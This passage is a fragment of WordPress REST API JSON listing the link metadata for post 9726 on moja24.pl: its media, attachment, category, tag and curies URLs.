ef":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/9780"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9726"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=9726"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=9726"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}